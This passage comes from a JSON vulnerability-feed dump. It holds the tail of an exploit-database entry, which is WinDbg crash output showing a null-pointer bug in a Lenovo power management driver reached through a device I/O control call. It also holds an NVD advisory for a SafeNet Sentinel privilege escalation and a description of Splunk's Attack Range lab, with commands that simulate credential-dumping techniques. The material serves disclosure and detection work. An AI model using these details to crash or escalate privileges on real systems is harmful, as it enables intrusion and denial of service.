[r11+8],eax\r\nfffff804`28bf10a3 e858ffffff call pmdrvs+0x1000 (fffff804`28bf1000)\r\nfffff804`28bf10a8 85c0 test eax,eax\r\nfffff804`28bf10aa 0f8582000000 jne pmdrvs+0x1132 (fffff804`28bf1132)\r\nfffff804`28bf10b0 488b8c2498000000 mov rcx,qword ptr [rsp+98h]\r\nfffff804`28bf10b8 4885c9 test rcx,rcx\r\nfffff804`28bf10bb 7475 je pmdrvs+0x1132 (fffff804`28bf1132)\r\n2: kd> !for_each_frame .frame /r @$Frame\r\n_ _ _ _ _ _ _ _ _ _ _ _ _ _ _ _\r\n00 ffffc709`dee8e318 fffff804`1f27a8e9 nt!KeBugCheckEx\r\n00 ffffc709`dee8e318 fffff804`1f27a8e9 nt!KeBugCheckEx\r\nrax=ffffc709dee8e420 rbx=ffffc709dee8fa00 rcx=000000000000003b\r\nrdx=00000000c0000005 rsi=ffffc709dee8eaf0 rdi=0000000000000000\r\nrip=fffff8041f269040 rsp=ffffc709dee8e318 rbp=ffffc709dee8ea10\r\n r8=fffff80428bf109d r9=ffffc709dee8ec50 r10=0000000000000000\r\nr11=000000001f0b5000 r12=fffff8041f27a305 r13=ffffc709dee8e510\r\nr14=0000000000000000 r15=ffffc709dee8f408\r\niopl=0 nv up ei ng nz na pe nc\r\ncs=0010 ss=0018 ds=002b es=002b fs=0053 gs=002b efl=00000282\r\nnt!KeBugCheckEx:\r\nfffff804`1f269040 48894c2408 mov qword ptr [rsp+8],rcx ss:0018:ffffc709`dee8e320=000000000000003b\r\n_ _ _ _ _ _ _ _ _ _ _ _ _ _ _ _\r\n01 ffffc709`dee8e320 fffff804`1f279d3c nt!setjmpex+0x7f09\r\n01 ffffc709`dee8e320 fffff804`1f279d3c nt!setjmpex+0x7f09\r\nrax=ffffc709dee8e420 rbx=ffffc709dee8fa00 rcx=000000000000003b\r\nrdx=00000000c0000005 rsi=ffffc709dee8eaf0 rdi=0000000000000000\r\nrip=fffff8041f27a8e9 rsp=ffffc709dee8e320 rbp=ffffc709dee8ea10\r\n r8=fffff80428bf109d r9=ffffc709dee8ec50 r10=0000000000000000\r\nr11=000000001f0b5000 r12=fffff8041f27a305 r13=ffffc709dee8e510\r\nr14=0000000000000000 r15=ffffc709dee8f408\r\niopl=0 nv up ei ng nz na pe nc\r\ncs=0010 ss=0018 ds=002b es=002b fs=0053 gs=002b efl=00000282\r\nnt!setjmpex+0x7f09:\r\nfffff804`1f27a8e9 90 nop\r\n_ _ _ _ _ _ _ _ _ _ _ _ _ _ _ _\r\n02 ffffc709`dee8e460 fffff804`1f271b4f nt!setjmpex+0x735c\r\n02 ffffc709`dee8e460 fffff804`1f271b4f nt!setjmpex+0x735c\r\nrax=ffffc709dee8e420 rbx=ffffc709dee8fa00 rcx=000000000000003b\r\nrdx=00000000c0000005 rsi=ffffc709dee8eaf0 rdi=0000000000000000\r\nrip=fffff8041f279d3c rsp=ffffc709dee8e460 rbp=ffffc709dee8ea10\r\n r8=fffff80428bf109d r9=ffffc709dee8ec50 r10=0000000000000000\r\nr11=000000001f0b5000 r12=fffff8041f27a305 r13=ffffc709dee8e510\r\nr14=0000000000000000 r15=ffffc709dee8f408\r\niopl=0 nv up ei ng nz na pe nc\r\ncs=0010 ss=0018 ds=002b es=002b fs=0053 gs=002b efl=00000282\r\nnt!setjmpex+0x735c:\r\nfffff804`1f279d3c b801000000 mov eax,1\r\n_ _ _ _ _ _ _ _ _ _ _ _ _ _ _ _\r\n03 ffffc709`dee8e4a0 fffff804`1f1ca460 nt!_chkstk+0x41f\r\n03 ffffc709`dee8e4a0 fffff804`1f1ca460 nt!_chkstk+0x41f\r\nrax=ffffc709dee8e420 rbx=ffffc709dee8fa00 rcx=000000000000003b\r\nrdx=00000000c0000005 rsi=ffffc709dee8eaf0 rdi=0000000000000000\r\nrip=fffff8041f271b4f rsp=ffffc709dee8e4a0 rbp=ffffc709dee8ea10\r\n r8=fffff80428bf109d r9=ffffc709dee8ec50 r10=0000000000000000\r\nr11=000000001f0b5000 r12=fffff8041f27a305 r13=ffffc709dee8e510\r\nr14=0000000000000000 r15=ffffc709dee8f408\r\niopl=0 nv up ei ng nz na pe nc\r\ncs=0010 ss=0018 ds=002b es=002b fs=0053 gs=002b efl=00000282\r\nnt!_chkstk+0x41f:\r\nfffff804`1f271b4f 0f1f00 nop dword ptr [rax]\r\n_ _ _ _ _ _ _ _ _ _ _ _ _ _ _ _\r\n04 ffffc709`dee8e4d0 fffff804`1f0d7c24 nt!RtlUnwindEx+0x3440\r\n04 ffffc709`dee8e4d0 fffff804`1f0d7c24 nt!RtlUnwindEx+0x3440\r\nrax=ffffc709dee8e420 rbx=ffffc709dee8fa00 rcx=000000000000003b\r\nrdx=00000000c0000005 rsi=ffffc709dee8eaf0 rdi=0000000000000000\r\nrip=fffff8041f1ca460 rsp=ffffc709dee8e4d0 rbp=ffffc709dee8ea10\r\n r8=fffff80428bf109d r9=ffffc709dee8ec50 r10=0000000000000000\r\nr11=000000001f0b5000 r12=fffff8041f27a305 r13=ffffc709dee8e510\r\nr14=0000000000000000 r15=ffffc709dee8f408\r\niopl=0 nv up ei ng nz na pe nc\r\ncs=0010 ss=0018 ds=002b es=002b fs=0053 gs=002b efl=00000282\r\nnt!RtlUnwindEx+0x3440:\r\nfffff804`1f1ca460 8bd0 mov edx,eax\r\n_ _ _ _ _ _ _ _ _ _ _ _ _ _ _ _\r\n05 ffffc709`dee8ec20 fffff804`1f27a9c2 nt!ExReleaseAutoExpandPushLockExclusive+0x264\r\n05 ffffc709`dee8ec20 fffff804`1f27a9c2 nt!ExReleaseAutoExpandPushLockExclusive+0x264\r\nrax=ffffc709dee8e420 rbx=ffffc709dee8f408 rcx=000000000000003b\r\nrdx=00000000c0000005 rsi=ffffc709dee8ec50 rdi=0000000000000000\r\nrip=fffff8041f0d7c24 rsp=ffffc709dee8ec20 rbp=ffffc709dee8f150\r\n r8=fffff80428bf109d r9=ffffc709dee8ec50 r10=0000000000000000\r\nr11=000000001f0b5000 r12=000000000010001f r13=ffffca04c1ca8d40\r\nr14=ffffc709dee8f4b0 r15=0000000000000000\r\niopl=0 nv up ei ng nz na pe nc\r\ncs=0010 ss=0018 ds=002b es=002b fs=0053 gs=002b efl=00000282\r\nnt!ExReleaseAutoExpandPushLockExclusive+0x264:\r\nfffff804`1f0d7c24 84c0 test al,al\r\n_ _ _ _ _ _ _ _ _ _ _ _ _ _ _ _\r\n06 ffffc709`dee8f2d0 fffff804`1f276cae nt!setjmpex+0x7fe2\r\n06 ffffc709`dee8f2d0 fffff804`1f276cae nt!setjmpex+0x7fe2\r\nrax=ffffc709dee8e420 rbx=ffffca04ca8f80a0 rcx=000000000000003b\r\nrdx=00000000c0000005 rsi=ffffca04ca8f8170 rdi=0000000000000000\r\nrip=fffff8041f27a9c2 rsp=ffffc709dee8f2d0 rbp=ffffc709dee8f530\r\n r8=fffff80428bf109d r9=ffffc709dee8ec50 r10=0000000000000000\r\nr11=000000001f0b5000 r12=0000000000000000 r13=ffffca04c1ca8d40\r\nr14=0000000000000002 r15=0000000000000000\r\niopl=0 nv up ei ng nz na pe nc\r\ncs=0010 ss=0018 ds=002b es=002b fs=0053 gs=002b efl=00000282\r\nnt!setjmpex+0x7fe2:\r\nfffff804`1f27a9c2 488d8c2400010000 lea rcx,[rsp+100h]\r\n_ _ _ _ _ _ _ _ _ _ _ _ _ _ _ _\r\n07 ffffc709`dee8f4b0 fffff804`28bf109d nt!setjmpex+0x42ce\r\n07 ffffc709`dee8f4b0 fffff804`28bf109d nt!setjmpex+0x42ce\r\nrax=ffffc709dee8e420 rbx=ffffca04ca8f80a0 rcx=000000000000003b\r\nrdx=00000000c0000005 rsi=ffffca04ca8f8170 rdi=0000000000000000\r\nrip=fffff8041f276cae rsp=ffffc709dee8f4b0 rbp=ffffc709dee8f530\r\n r8=fffff80428bf109d r9=ffffc709dee8ec50 r10=0000000000000000\r\nr11=000000001f0b5000 r12=0000000000000000 r13=ffffca04c1ca8d40\r\nr14=0000000000000002 r15=0000000000000000\r\niopl=0 nv up ei ng nz na pe nc\r\ncs=0010 ss=0018 ds=002b es=002b fs=0053 gs=002b efl=00000282\r\nnt!setjmpex+0x42ce:\r\nfffff804`1f276cae 440f20c0 mov rax,cr8\r\n_ _ _ _ _ _ _ _ _ _ _ _ _ _ _ _\r\n08 ffffc709`dee8f640 fffff804`28bf5060 pmdrvs+0x109d\r\n08 ffffc709`dee8f640 fffff804`28bf5060 pmdrvs+0x109d\r\nrax=fffff80428bf5020 rbx=ffffca04ca8f80a0 rcx=ffffc709dee8f6d8\r\nrdx=ffffca04ca8f8170 rsi=ffffca04ca8f8170 rdi=0000000000000000\r\nrip=fffff80428bf109d rsp=ffffc709dee8f640 rbp=ffffca04cc188290\r\n r8=000000000000000e r9=ffffca04c1ca8d40 r10=fffff80428bf5020\r\nr11=ffffc709dee8f6b8 r12=0000000000000000 r13=ffffca04c1ca8d40\r\nr14=0000000000000002 r15=0000000000000000\r\niopl=0 nv up ei ng nz na pe nc\r\ncs=0010 ss=0018 ds=002b es=002b fs=0053 gs=002b efl=00000282\r\npmdrvs+0x109d:\r\nfffff804`28bf109d 8b07 mov eax,dword ptr [rdi] ds:002b:00000000`00000000=????????\r\n_ _ _ _ _ _ _ _ _ _ _ _ _ _ _ _\r\n09 ffffc709`dee8f6c0 fffff804`1f12dba9 pmdrvs+0x5060\r\n09 ffffc709`dee8f6c0 fffff804`1f12dba9 pmdrvs+0x5060\r\nrax=fffff80428bf5020 rbx=ffffca04ca8f80a0 rcx=ffffc709dee8f6d8\r\nrdx=ffffca04ca8f8170 rsi=0000000000000001 rdi=0000000000000000\r\nrip=fffff80428bf5060 rsp=ffffc709dee8f6c0 rbp=ffffca04cc188290\r\n r8=000000000000000e r9=ffffca04c1ca8d40 r10=fffff80428bf5020\r\nr11=ffffc709dee8f6b8 r12=0000000000000000 r13=ffffca04c1ca8d40\r\nr14=0000000000000002 r15=0000000000000000\r\niopl=0 nv up ei ng nz na pe nc\r\ncs=0010 ss=0018 ds=002b es=002b fs=0053 gs=002b efl=00000282\r\npmdrvs+0x5060:\r\nfffff804`28bf5060 eb28 jmp pmdrvs+0x508a (fffff804`28bf508a)\r\n_ _ _ _ _ _ _ _ _ _ _ _ _ _ _ _\r\n0a ffffc709`dee8f6f0 fffff804`1f6abb11 nt!IofCallDriver+0x59\r\n0a ffffc709`dee8f6f0 fffff804`1f6abb11 nt!IofCallDriver+0x59\r\nrax=fffff80428bf5020 rbx=ffffca04ca8f80a0 rcx=ffffc709dee8f6d8\r\nrdx=ffffca04ca8f8170 rsi=0000000000000001 rdi=ffffca04cc188290\r\nrip=fffff8041f12dba9 rsp=ffffc709dee8f6f0 rbp=ffffca04cc188290\r\n r8=000000000000000e r9=ffffca04c1ca8d40 r10=fffff80428bf5020\r\nr11=ffffc709dee8f6b8 r12=0000000000000000 r13=ffffca04c1ca8d40\r\nr14=0000000000000002 r15=0000000000000000\r\niopl=0 nv up ei ng nz na pe nc\r\ncs=0010 ss=0018 ds=002b es=002b fs=0053 gs=002b efl=00000282\r\nnt!IofCallDriver+0x59:\r\nfffff804`1f12dba9 4883c438 add rsp,38h\r\n_ _ _ _ _ _ _ _ _ _ _ _ _ _ _ _\r\n0b ffffc709`dee8f730 fffff804`1f6d763c nt!NtQueryInformationFile+0x1071\r\n0b ffffc709`dee8f730 fffff804`1f6d763c nt!NtQueryInformationFile+0x1071\r\nrax=fffff80428bf5020 rbx=ffffca04ca8f80a0 rcx=ffffc709dee8f6d8\r\nrdx=ffffca04ca8f8170 rsi=0000000000000001 rdi=ffffca04cc188290\r\nrip=fffff8041f6abb11 rsp=ffffc709dee8f730 rbp=ffffca04cc188290\r\n r8=000000000000000e r9=ffffca04c1ca8d40 r10=fffff80428bf5020\r\nr11=ffffc709dee8f6b8 r12=0000000000000000 r13=ffffca04c1ca8d40\r\nr14=0000000000000002 r15=0000000000000000\r\niopl=0 nv up ei ng nz na pe nc\r\ncs=0010 ss=0018 ds=002b es=002b fs=0053 gs=002b efl=00000282\r\nnt!NtQueryInformationFile+0x1071:\r\nfffff804`1f6abb11 448bf0 mov r14d,eax\r\n_ _ _ _ _ _ _ _ _ _ _ _ _ _ _ _\r\n0c ffffc709`dee8f7e0 fffff804`1f64c356 nt!NtClose+0xffc\r\n0c ffffc709`dee8f7e0 fffff804`1f64c356 nt!NtClose+0xffc\r\nrax=fffff80428bf5020 rbx=ffffca04cc188290 rcx=ffffc709dee8f6d8\r\nrdx=ffffca04ca8f8170 rsi=0000000000000000 rdi=ffffca04ca8f80a0\r\nrip=fffff8041f6d763c rsp=ffffc709dee8f7e0 rbp=ffffc709dee8fa80\r\n r8=000000000000000e r9=ffffca04c1ca8d40 r10=fffff80428bf5020\r\nr11=ffffc709dee8f6b8 r12=ffffca04ca8f81b8 r13=fffff780000002dc\r\nr14=0000000000000000 r15=0000000000000000\r\niopl=0 nv up ei ng nz na pe nc\r\ncs=0010 ss=0018 ds=002b es=002b fs=0053 gs=002b efl=00000282\r\nnt!NtClose+0xffc:\r\nfffff804`1f6d763c eb25 jmp nt!NtClose+0x1023 (fffff804`1f6d7663)\r\n_ _ _ _ _ _ _ _ _ _ _ _ _ _ _ _\r\n0d ffffc709`dee8f920 fffff804`1f27a305 nt!NtDeviceIoControlFile+0x56\r\n0d ffffc709`dee8f920 fffff804`1f27a305 nt!NtDeviceIoControlFile+0x56\r\nrax=fffff80428bf5020 rbx=ffffca04c88b3080 rcx=ffffc709dee8f6d8\r\nrdx=ffffca04ca8f8170 rsi=000000000068fd18 rdi=ffffc709dee8f9a8\r\nrip=fffff8041f64c356 rsp=ffffc709dee8f920 rbp=ffffc709dee8fa80\r\n r8=000000000000000e r9=ffffca04c1ca8d40 r10=fffff80428bf5020\r\nr11=ffffc709dee8f6b8 r12=0000000000000000 r13=0000000000000010\r\nr14=0000000000000000 r15=0000000000000000\r\niopl=0 nv up ei ng nz na pe nc\r\ncs=0010 ss=0018 ds=002b es=002b fs=0053 gs=002b efl=00000282\r\nnt!NtDeviceIoControlFile+0x56:\r\nfffff804`1f64c356 4883c468 add rsp,68h\r\n_ _ _ _ _ _ _ _ _ _ _ _ _ _ _ _\r\n0e ffffc709`dee8f990 00007fff`33aaf844 nt!setjmpex+0x7925\r\n0e ffffc709`dee8f990 00007fff`33aaf844 nt!setjmpex+0x7925\r\nrax=fffff80428bf5020 rbx=ffffca04c88b3080 rcx=ffffc709dee8f6d8\r\nrdx=ffffca04ca8f8170 rsi=000000000068fd18 rdi=ffffc709dee8f9a8\r\nrip=fffff8041f27a305 rsp=ffffc709dee8f990 rbp=ffffc709dee8fa80\r\n r8=000000000000000e r9=ffffca04c1ca8d40 r10=fffff80428bf5020\r\nr11=ffffc709dee8f6b8 r12=0000000000000000 r13=0000000000000010\r\nr14=0000000000000000 r15=0000000000000000\r\niopl=0 nv up ei ng nz na pe nc\r\ncs=0010 ss=0018 ds=002b es=002b fs=0053 gs=002b efl=00000282\r\nnt!setjmpex+0x7925:\r\nfffff804`1f27a305 0f1f00 nop dword ptr [rax]\r\n_ _ _ _ _ _ _ _ _ _ _ _ _ _ _ _\r\n0f 00000000`0068fcf8 00000000`00000000 0x00007fff`33aaf844\r\n0f 00000000`0068fcf8 00000000`00000000 0x00007fff`33aaf844\r\nrax=fffff80428bf5020 rbx=0000000000000000 rcx=ffffc709dee8f6d8\r\nrdx=ffffca04ca8f8170 rsi=00000000deadbeef rdi=000000000000004c\r\nrip=00007fff33aaf844 rsp=000000000068fcf8 rbp=000000000000004c\r\n r8=000000000000000e r9=ffffca04c1ca8d40 r10=fffff80428bf5020\r\nr11=ffffc709dee8f6b8 r12=0000000000000000 r13=0000000000000010\r\nr14=0000000000000000 r15=0000000000000000\r\niopl=0 nv up ei ng nz na pe nc\r\ncs=0010 ss=0018 ds=002b es=002b fs=0053 gs=002b efl=00000282\r\n00007fff`33aaf844 ?? ???\r\n_ _ _ _ _ _ _ _ _ _ _ _ _ _ _ _\r\n00 ffffc709`dee8e318 fffff804`1f27a8e9 nt!KeBugCheckEx\r\n\r\n# Mitigation\r\n\r\nUpdate to Lenovo Power Management driver version 1.67.17.48 or higher\n\n# 0day.today [2019-12-12] #", "cvss": {"score": 0.0, "vector": "NONE"}, "sourceHref": "https://0day.today/exploit/33654"}], "cve": [{"lastseen": "2019-12-12T13:26:42", "bulletinFamily": "NVD", "description": "SafeNet Sentinel LDK License Manager, all versions prior to 7.101(only Microsoft Windows versions are affected) is vulnerable when configured as a service. This vulnerability may allow an attacker with local access to create, write, and/or delete files in system folder using symbolic links, leading to a privilege escalation. This vulnerability could also be used by an attacker to execute a malicious DLL, which could impact the integrity and availability of the system.", "modified": "2019-12-11T23:17:00", "id": "CVE-2019-18232", "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2019-18232", "published": "2019-12-11T23:15:00", "title": "CVE-2019-18232", "type": "cve", "cvss": {"score": 0.0, "vector": "NONE"}}], "kitploit": [{"lastseen": "2019-12-12T00:25:16", "bulletinFamily": "tools", "description": "[  ](<https://1.bp.blogspot.com/-9BGytRDmNUY/XfA3X9Qr_fI/AAAAAAAAREI/31Vq6PqurMQiMGPj7OKZaBZjivGSgqqWwCNcBGAsYHQ/s1600/attack_range_1_range.jpeg>)\n\n \nThe Attack Range solves two main challenges in development of detections. First, it allows the user to quickly build a small lab infrastructure as close as possible to your production environment. This lab infrastructure contains a [ Windows ](<https://www.kitploit.com/search/label/Windows> \"Windows\" ) Domain Controller, Windows Workstation and Linux server, which comes pre-configured with multiple security tools and logging configuration. The infrastructure comes with a [ Splunk ](<https://www.kitploit.com/search/label/Splunk> \"Splunk\" ) server collecting multiple log sources from the different servers. \nSecond, this framework allows the user to perform attack simulation using different engines. Therefore, the user can repeatedly replicate and generate data as close to \"ground truth\" as possible, in a format that allows the creation of detections, investigations, knowledge objects, and playbooks in Splunk. \n \n** Architecture ** \nAttack Range can be used in two different ways: \n\n\n * local using vagrant and virtualbox \n * in the cloud using terraform and AWS \nIn order to make Attack Range work on almost every laptop, the local version using Vagrant and [ Virtualbox ](<https://www.kitploit.com/search/label/Virtualbox> \"Virtualbox\" ) consists of a subset of the full-blown cloud infrastructure in AWS using Terraform. The local version consists of a Splunk single instance and a Windows 10 workstation pre-configured with best practice logging configuration according to Splunk. The cloud infrastructure in AWS using [ Terraform ](<https://www.kitploit.com/search/label/Terraform> \"Terraform\" ) consists of a Windows 10 workstation, a Windows 2016 server and a Splunk server. More information can be found in the wiki \n \n\n\n[  ](<https://1.bp.blogspot.com/-9T8SYVL70Ww/XfA3eg-rfoI/AAAAAAAAREM/GKHzN5r6Xy8bADvUlV9kg9aQjIuYfqm-QCNcBGAsYHQ/s1600/attack_range_2_architecture.png>)\n\n \n** Configuration ** \n\n\n * [ vagrant and virtualbox ](<https://github.com/splunk/attack_range/wiki/Configure-Attack-Range-for-Vagrant> \"vagrant and virtualbox\" )\n * [ terraform and AWS ](<https://github.com/splunk/attack_range/wiki/Configure-Attack-Range-for-Terraform> \"terraform and AWS\" )\n \n** Running ** \nAttack Range supports different actions: \n\n\n * Build Attack Range \n * Perform Attack Simulation \n * Destroy Attack Range \n * Stop Attack Range \n * Resume Attack Range \n \n** Build Attack Range ** \n\n\n * Build Attack Range using ** Terraform **\n \n \n python attack_range.py -m terraform -a build\n\n * Build Attack Range using ** Vagrant **\n \n \n python attack_range.py -m vagrant -a build\n\n \n** Perform Attack Simulation ** \n\n\n * Perform Attack [ Simulation ](<https://www.kitploit.com/search/label/Simulation> \"Simulation\" ) using ** Terraform **\n \n \n python attack_range.py -m terraform -a simulate -st T1117,T1003 -t attack-range_windows_2016_dc\n\n * Perform Attack Simulation using ** Vagrant **\n \n \n python attack_range.py -m vagrant -a simulate -st T1117,T1003 -t win10\n\n \n** Destroy Attack Range ** \n\n\n * Destroy Attack Range using ** Terraform **\n \n \n python attack_range.py -m terraform -a destroy\n\n * Destroy Attack Range using ** Vagrant **\n \n \n python attack_range.py -m vagrant -a destroy\n\n \n** Stop Attack Range ** \n\n\n * Stop Attack Range using ** Terraform **\n \n \n python attack_range.py -m terraform -a stop\n\n * Stop Attack Range using ** Vagrant **\n \n \n python attack_range.py -m vagrant -a stop\n\n \n** Resume Attack Range ** \n\n\n * Resume Attack Range using ** Terraform **\n \n \n python attack_range.py -m terraform -a resume\n\n * Resume Attack Range using ** Vagrant **\n \n \n python attack_range.py -m vagrant -a resume\n\n \n** Support ** \nPlease use the [ GitHub issue tracker ](<https://github.com/splunk/attack_range/issues> \"GitHub issue tracker\" ) to submit bugs or request features. \nIf you have questions or need support, you can: \n\n\n * Post a question to [ Splunk Answers ](<http://answers.splunk.com/> \"Splunk Answers\" )\n * Join the [ #security-research ](<https://splunk-usergroups.slack.com/messages/C1RH09ERM/> \"#security-research\" ) room in the [ Splunk Slack channel ](<https://splunk-usergroups.slack.com/> \"Splunk Slack channel\" )\n * If you are a Splunk Enterprise customer with a valid support entitlement contract and have a Splunk-related question, you can also open a support case on the [ https://www.splunk.com/ ](<https://www.splunk.com/> \"https://www.splunk.com/\" ) support portal \n \n** Author ** \n\n\n * [ Jose Hernandez ](<https://twitter.com/d1vious> \"Jose Hernandez\" )\n \n** Contributors ** \n\n\n * [ Rod Soto ](<https://twitter.com/rodsoto> \"Rod Soto\" )\n * [ Bhavin Patel ](<https://twitter.com/hackpsy> \"Bhavin Patel\" )\n * [ Patrick Barei\u00df ](<https://twitter.com/bareiss_patrick> \"Patrick Barei\u00df\" )\n * Russ Nolen \n * Phil Royer \n \n** Acknowledgements ** \n\n\n * [ DetectionLab ](<https://github.com/clong/DetectionLab> \"DetectionLab\" )\n * Atomic Red team \n * Sysmon configuration \n \n \n\n\n** [ Download Attack_Range ](<https://github.com/splunk/attack_range> \"Download Attack_Range\" ) **\n", "modified": "2019-12-11T20:25:04", "published": "2019-12-11T20:25:04", "id": "KITPLOIT:7162804391274749673", "href": "http://www.kitploit.com/2019/12/splunk-attack-range-tool-that-allows.html", "title": "Splunk Attack Range - A Tool That Allows You To Create Vulnerable Instrumented Local Or Cloud Environments To Simulate Attacks Against And Collect The Data Into Splunk", "type": "kitploit", "cvss": {"score": 0.0, "vector": "NONE"}}]}
